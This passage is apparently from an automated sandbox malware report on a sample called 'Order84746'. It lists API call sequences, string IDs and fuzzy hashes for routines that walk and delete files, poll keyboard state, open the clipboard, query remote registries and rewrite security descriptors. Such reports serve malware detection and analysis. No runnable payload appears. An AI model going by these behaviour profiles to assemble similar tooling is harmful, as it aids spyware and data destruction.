                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                          • API String ID: 835046349-2428617273
                          • Opcode ID: 3d611dca2c199ac67a5f0a403cdd764142c1a3131a54c5dc52b73bc96b8de4c5
                          • Instruction ID: 61556d49e9b56b0ecbe9e130d1070c013e2517c17e787c21338cc7ea48702ed2
                          • Opcode Fuzzy Hash: 3d611dca2c199ac67a5f0a403cdd764142c1a3131a54c5dc52b73bc96b8de4c5
                          • Instruction Fuzzy Hash: 32A11EB2508344ABC310EBA9C895DAFB7ECFF99704F40092EF595C2192EB74D949C762
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00931B50
                          • _wcscmp.LIBCMT ref: 00931B65
                          • _wcscmp.LIBCMT ref: 00931B7C
                          • GetFileAttributesW.KERNEL32(?), ref: 00931B8E
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00931BA8
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00931BC0
                          • FindClose.KERNEL32(00000000), ref: 00931BCB
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00931BE7
                          • _wcscmp.LIBCMT ref: 00931C0E
                          • _wcscmp.LIBCMT ref: 00931C25
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00931C37
                          • SetCurrentDirectoryW.KERNEL32(009939FC), ref: 00931C55
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00931C5F
                          • FindClose.KERNEL32(00000000), ref: 00931C6C
                          • FindClose.KERNEL32(00000000), ref: 00931C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1803514871-438819550
                          • Opcode ID: cbee774c8336adb6d93d66d5e62ff6f8b99eca28e929f047faaf76b382b9a9b0
                          • Instruction ID: ebe494cf73a5468a0750b8c581be73facea0cc622c5db9dc6e2dc4405a8b2a15
                          • Opcode Fuzzy Hash: cbee774c8336adb6d93d66d5e62ff6f8b99eca28e929f047faaf76b382b9a9b0
                          • Instruction Fuzzy Hash: 5831B532A05219AFDF14AFA4DC49BDE77ACAF45324F104165F815E30A0EBB0DE459E64
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • DragQueryPoint.SHELL32(?,?), ref: 0094F37A
                            • Part of subcall function 0094D7DE: ClientToScreen.USER32(?,?), ref: 0094D807
                            • Part of subcall function 0094D7DE: GetWindowRect.USER32(?,?), ref: 0094D87D
                            • Part of subcall function 0094D7DE: PtInRect.USER32(?,?,0094ED5A), ref: 0094D88D
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0094F3E3
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0094F3EE
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0094F411
                          • _wcscat.LIBCMT ref: 0094F441
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0094F458
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0094F471
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0094F488
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0094F4AA
                          • DragFinish.SHELL32(?), ref: 0094F4B1
                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0094F59C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                          • API String ID: 2166380349-3440237614
                          • Opcode ID: 86b45d1caff32bc89af63fad97b35a3ce2425521be5fdabe1a6320212660ea4a
                          • Instruction ID: 21d919b91e2148f6f391c8dc53e2159793f11339ea77d4e85256d9b07eef4e87
                          • Opcode Fuzzy Hash: 86b45d1caff32bc89af63fad97b35a3ce2425521be5fdabe1a6320212660ea4a
                          • Instruction Fuzzy Hash: 4F614871508341AFC711EF69CC85EAFBBE8FF89714F000A1EF695921A1DB719A09CB52
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00931CAB
                          • _wcscmp.LIBCMT ref: 00931CC0
                          • _wcscmp.LIBCMT ref: 00931CD7
                            • Part of subcall function 00926BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00926BEF
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00931D06
                          • FindClose.KERNEL32(00000000), ref: 00931D11
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00931D2D
                          • _wcscmp.LIBCMT ref: 00931D54
                          • _wcscmp.LIBCMT ref: 00931D6B
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00931D7D
                          • SetCurrentDirectoryW.KERNEL32(009939FC), ref: 00931D9B
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00931DA5
                          • FindClose.KERNEL32(00000000), ref: 00931DB2
                          • FindClose.KERNEL32(00000000), ref: 00931DC2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 1824444939-438819550
                          • Opcode ID: 72d2229150409b99ecc0b7eeede0b0c013f2b508aa270129c729114900ce6e65
                          • Instruction ID: f59b2040bdf696192b3d090ec230b207a5d84dd8c23b3833f5ab2537fb827a1f
                          • Opcode Fuzzy Hash: 72d2229150409b99ecc0b7eeede0b0c013f2b508aa270129c729114900ce6e65
                          • Instruction Fuzzy Hash: 7D310832A05619AECF14AFA4DC09BDE37EDAF46324F104555F821A70E0DB70DE459F50
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 009309DF
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 009309EF
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009309FB
                          • __wsplitpath.LIBCMT ref: 00930A59
                          • _wcscat.LIBCMT ref: 00930A71
                          • _wcscat.LIBCMT ref: 00930A83
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00930A98
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00930AAC
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00930ADE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00930AFF
                          • _wcscpy.LIBCMT ref: 00930B0B
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00930B4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                          • String ID: *.*
                          • API String ID: 3566783562-438819550
                          • Opcode ID: 08a0b57e635c59cc0ea7dbe5b1534d3f844ac4a719e9389485b9643ce8fa7aec
                          • Instruction ID: 3dc801ca58204a668861ed8be8ba75c08b14e089953feaead15602efca6cc683
                          • Opcode Fuzzy Hash: 08a0b57e635c59cc0ea7dbe5b1534d3f844ac4a719e9389485b9643ce8fa7aec
                          • Instruction Fuzzy Hash: 936145725082059FDB10EF64C855AAEB3E8FFC9310F04891AE999C7252DB31EA45CF92
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0094EF3B
                          • GetFocus.USER32 ref: 0094EF4B
                          • GetDlgCtrlID.USER32(00000000), ref: 0094EF56
                          • _memset.LIBCMT ref: 0094F081
                          • GetMenuItemInfoW.USER32 ref: 0094F0AC
                          • GetMenuItemCount.USER32(00000000), ref: 0094F0CC
                          • GetMenuItemID.USER32(?,00000000), ref: 0094F0DF
                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0094F113
                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0094F15B
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0094F193
                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0094F1C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                          • String ID: 0
                          • API String ID: 3616455698-4108050209
                          • Opcode ID: 1b95dcf43f999abb829296dbe84a997f5ae71c7476be89032481c37ebeedcc35
                          • Instruction ID: acc2a3b6868ba2218bd83283ca4151cc7c3b4f392e0e676a183ff93daab3d4af
                          • Opcode Fuzzy Hash: 1b95dcf43f999abb829296dbe84a997f5ae71c7476be89032481c37ebeedcc35
                          • Instruction Fuzzy Hash: FB818C71609316AFDB20CF24C894E6BBBE9FF88314F04492EF99597291D770D905CBA2
                          APIs
                            • Part of subcall function 0091ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0091ABD7
                            • Part of subcall function 0091ABBB: GetLastError.KERNEL32(?,0091A69F,?,?,?), ref: 0091ABE1
                            • Part of subcall function 0091ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0091A69F,?,?,?), ref: 0091ABF0
                            • Part of subcall function 0091ABBB: RtlAllocateHeap.NTDLL(00000000,?,0091A69F), ref: 0091ABF7
                            • Part of subcall function 0091ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0091AC0E
                            • Part of subcall function 0091AC56: GetProcessHeap.KERNEL32(00000008,0091A6B5,00000000,00000000,?,0091A6B5,?), ref: 0091AC62
                            • Part of subcall function 0091AC56: RtlAllocateHeap.NTDLL(00000000,?,0091A6B5), ref: 0091AC69
                            • Part of subcall function 0091AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0091A6B5,?), ref: 0091AC7A
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0091A6D0
                          • _memset.LIBCMT ref: 0091A6E5
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0091A704
                          • GetLengthSid.ADVAPI32(?), ref: 0091A715
                          • GetAce.ADVAPI32(?,00000000,?), ref: 0091A752
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0091A76E
                          • GetLengthSid.ADVAPI32(?), ref: 0091A78B
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0091A79A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091A7A1
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0091A7C2
                          • CopySid.ADVAPI32(00000000), ref: 0091A7C9
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0091A7FA
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0091A820
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0091A834
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          • Opcode ID: 42cdaf8cf27e916885efb8b753d58a29c47a4b6045ca76c33282ea6fd48c6891
                          • Instruction ID: e64d7b81f207046649899bb48bbe759e2b3877a26f81272271a3b124df440406
                          • Opcode Fuzzy Hash: 42cdaf8cf27e916885efb8b753d58a29c47a4b6045ca76c33282ea6fd48c6891
                          • Instruction Fuzzy Hash: 9F516B71A01209AFDF01DFA1DC44AEEBBB9FF04310F048169F821A72A1DB749E46DB61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                          • API String ID: 0-4052911093
                          • Opcode ID: c460eddb67d2bbc2817e867fd2e9cfca62b30574a258f3e02aa05886dfd70b43
                          • Instruction ID: d59c8ec531c011fedab7124c574f2c21a72497f141626a0e3ddb65927ecaca10
                          • Opcode Fuzzy Hash: c460eddb67d2bbc2817e867fd2e9cfca62b30574a258f3e02aa05886dfd70b43
                          • Instruction Fuzzy Hash: 25729071E04259DBDF24CF59C8807AEB7B5FF49314F14816AE809EB280EB749E81DB90
                          APIs
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00925FA6,?), ref: 00926ED8
                            • Part of subcall function 009272CB: GetFileAttributesW.KERNEL32(?,00926019), ref: 009272CC
                          • _wcscat.LIBCMT ref: 00926441
                          • __wsplitpath.LIBCMT ref: 0092645F
                          • FindFirstFileW.KERNEL32(?,?), ref: 00926474
                          • _wcscpy.LIBCMT ref: 009264A3
                          • _wcscat.LIBCMT ref: 009264B8
                          • _wcscat.LIBCMT ref: 009264CA
                          • DeleteFileW.KERNEL32(?), ref: 009264DA
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 009264EB
                          • FindClose.KERNEL32(00000000), ref: 00926506
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                          • String ID: \*.*
                          • API String ID: 2643075503-1173974218
                          • Opcode ID: 490bc8e9f357e430cd13403a072d5ffdc2695e4343d30af342b51096a1ec9395
                          • Instruction ID: 6cb2f4ab96ceadd5cb258d94e00f1c78dc729d35036d420139612a8f77b24cb1
                          • Opcode Fuzzy Hash: 490bc8e9f357e430cd13403a072d5ffdc2695e4343d30af342b51096a1ec9395
                          • Instruction Fuzzy Hash: 1031A2B240D3949EC721EBA49885EDBB7DCAF96300F00091EF5D8C3141EB35D50987A7
                          APIs
                            • Part of subcall function 00943C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00942BB5,?,?), ref: 00943C1D
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0094328E
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0094332D
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009433C5
                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00943604
                          • RegCloseKey.ADVAPI32(00000000), ref: 00943611
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                          • String ID:
                          • API String ID: 1240663315-0
                          • Opcode ID: fe4500f2731ddcb5aa54d9ac66348be7ee8c9bf2eec48f4355f622c59fefebb9
                          • Instruction ID: c5d89d3bed0c8e6799ff0faba030a98517fff33d927e7ef0f95f367038e256e8
                          • Opcode Fuzzy Hash: fe4500f2731ddcb5aa54d9ac66348be7ee8c9bf2eec48f4355f622c59fefebb9
                          • Instruction Fuzzy Hash: 5CE15B31604210AFCB14DF29C995E6ABBE8FF89310F04896DF55AD72A2DB30ED05CB52
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00922B5F
                          • GetAsyncKeyState.USER32(000000A0), ref: 00922BE0
                          • GetKeyState.USER32(000000A0), ref: 00922BFB
                          • GetAsyncKeyState.USER32(000000A1), ref: 00922C15
                          • GetKeyState.USER32(000000A1), ref: 00922C2A
                          • GetAsyncKeyState.USER32(00000011), ref: 00922C42
                          • GetKeyState.USER32(00000011), ref: 00922C54
                          • GetAsyncKeyState.USER32(00000012), ref: 00922C6C
                          • GetKeyState.USER32(00000012), ref: 00922C7E
                          • GetAsyncKeyState.USER32(0000005B), ref: 00922C96
                          • GetKeyState.USER32(0000005B), ref: 00922CA8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 4b6bedc1ae0442e53716200eb90486416c4e4d684d459714f525ddf49e157842
                          • Instruction ID: 2f5b222d2f892466654a67228f821d05be9276f84eacb2a636e22f5ca7a56908
                          • Opcode Fuzzy Hash: 4b6bedc1ae0442e53716200eb90486416c4e4d684d459714f525ddf49e157842
                          • Instruction Fuzzy Hash: D341FA30A087D97DFF31DB60A8043B9BEA86F12314F04809DD5C6566C9DBE499C8C7A2
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          • Opcode ID: 2ee1744a1a67647595bf98e6a26511024e50fbbaba2e6215a4f70647234aceaa
                          • Instruction ID: 9b218781a545d0ba06c2f0cfcd7bc1a81887e52a090752c447ba07d6aabf8b65
                          • Opcode Fuzzy Hash: 2ee1744a1a67647595bf98e6a26511024e50fbbaba2e6215a4f70647234aceaa
                          • Instruction Fuzzy Hash: CE21AE31715210AFDB11AF69DC49B2D77A8FF44710F05841AF96ADB2A1CBB4ED009FA1
                          APIs
                            • Part of subcall function 00919ABF: CLSIDFromProgID.COMBASE ref: 00919ADC
                            • Part of subcall function 00919ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00919AF7
                            • Part of subcall function 00919ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00919B05
                            • Part of subcall function 00919ABF: CoTaskMemFree.COMBASE(00000000), ref: 00919B15
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0093C235
                          • _memset.LIBCMT ref: 0093C242
                          • _memset.LIBCMT ref: 0093C360
                          • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0093C38C
                          • CoTaskMemFree.COMBASE(?), ref: 0093C397
                          Strings
                          • NULL Pointer assignment, xrefs: 0093C3E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 1300414916-2785691316
                          • Opcode ID: 09eb6aeb1655a68ef1e3d41019dd226fdeadf6f1d7cfc7bb02c2fa457e789c33
